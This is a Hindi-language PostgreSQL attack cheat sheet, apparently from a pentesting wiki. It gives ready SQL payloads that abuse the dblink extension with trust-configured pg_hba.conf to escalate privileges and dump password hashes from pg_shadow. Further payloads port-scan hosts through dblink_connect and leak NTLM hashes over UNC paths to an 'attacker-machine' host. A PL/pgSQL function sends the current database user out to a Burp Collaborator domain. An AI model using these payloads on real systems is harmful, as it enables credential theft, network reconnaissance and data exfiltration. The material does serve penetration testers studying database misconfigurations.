इन हमलों के बारे में अधिक जानकारी के लिए मूल पेपर में जाएं.

PostgreSQL 9.1 से, अतिरिक्त मॉड्यूलों का स्थापना सरल है। रजिस्टर्ड एक्सटेंशन्स जैसे dblink CREATE EXTENSION के साथ स्थापित किए जा सकते हैं:

CREATE EXTENSION dblink;

विशेषाधिकार उन्नयन

जब आपके पास dblink लोड हो जाता है, तो आप कुछ दिलचस्प ट्रिक्स का प्रदर्शन कर सकते हैं:

फ़ाइल pg_hba.conf गलत रूप से कॉन्फ़िगर की जा सकती है लोकलहोस्ट से कनेक्शन की अनुमति देना जिसमें किसी भी उपयोगकर्ता के रूप में पासवर्ड को जानने की आवश्यकता नहीं होती है। यह फ़ाइल सामान्यत: /etc/postgresql/12/main/pg_hba.conf में पाई जा सकती है और एक बुरी कॉन्फ़िगरेशन इस तरह दिखती है:

local    all    all    trust

ध्यान दें कि यह विन्यास आम तौर पर उस समय का उपयोग किया जाता है जब व्यवस्थापक उसे भूल जाता है, तो किसी डीबी उपयोगकर्ता का पासवर्ड संशोधित करने के लिए, इसलिए कभी-कभी आपको इसे मिल सकता है। ध्यान दें कि फ़ाइल pg_hba.conf केवल पोस्टग्रेस उपयोगकर्ता और समूह द्वारा पढ़ने योग्य है और केवल पोस्टग्रेस उपयोगकर्ता द्वारा लिखने योग्य है।

यह मामला उपयोगी है अगर आपके पास पहले से ही एक शैल है जो पीड़ित के अंदर है क्योंकि यह आपको पोस्टग्रेसक्यूएल डेटाबेस से कनेक्ट करने की अनुमति देगा।

एक और संभावित गलत विन्यास इस प्रकार का हो सकता है:

host    all     all     127.0.0.1/32    trust

यह लोगों को localhost से डेटाबेस में किसी भी उपयोगकर्ता के रूप में कनेक्ट करने की अनुमति देगा। इस मामले में और अगर dblink फ़ंक्शन काम कर रहा है, तो आप पहले से स्थापित कनेक्शन के माध्यम से डेटाबेस से कनेक्ट होकर विशेषाधिकारों को उन्नत कर सकते हैं और डेटा तक पहुंच सकते हैं जिसका उपयोगकर्ता पहुंचना नहीं चाहिए।

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'SELECT datname FROM pg_database')
RETURNS (result TEXT);

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'select usename, passwd from pg_shadow')
RETURNS (result1 TEXT, result2 TEXT);

पोर्ट स्कैनिंग

dblink_connect का दुरुपयोग करके आप खुले पोर्ट खोज सकते हैं। यदि यह **फ़ंक्शन काम नहीं करता है तो आपको dblink_connect_u() का उपयोग करने की कोशिश करनी चाहिए क्योंकि दस्तावेज़ कहते हैं कि dblink_connect_u() dblink_connect() के तुलनात्मक है, केवल यह अनुमति देगा कि गैर-सुपरउपयोगकर्ता किसी भी प्रमाणीकरण विधि का उपयोग करके कनेक्ट कर सकते हैं।

SELECT * FROM dblink_connect('host=216.58.212.238
port=443
user=name
password=secret
dbname=abc
connect_timeout=10');
//Different response
// Port closed
RROR:  could not establish connection
DETAIL:  could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 4444?

// Port Filtered/Timeout
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTP server
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTPS server
ERROR:  could not establish connection
DETAIL:  received invalid response to SSL negotiation:

नोट करें कि पहले dblink_connect या dblink_connect_u का उपयोग करने के लिए आपको निम्नलिखित को निष्पादित करने की आवश्यकता हो सकती है:

CREATE extension dblink;

UNC पथ - NTLM हैश फासलेने

-- can be used to leak hashes to Responder/equivalent
CREATE TABLE test();
COPY test FROM E'\\\\attacker-machine\\footestbar.txt';

-- to extract the value of user and send it to Burp Collaborator
CREATE TABLE test(retval text);
CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$
DECLARE sqlstring TEXT;
DECLARE userval TEXT;
BEGIN
SELECT INTO userval (SELECT user);
sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';
EXECUTE sqlstring;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT testfunc();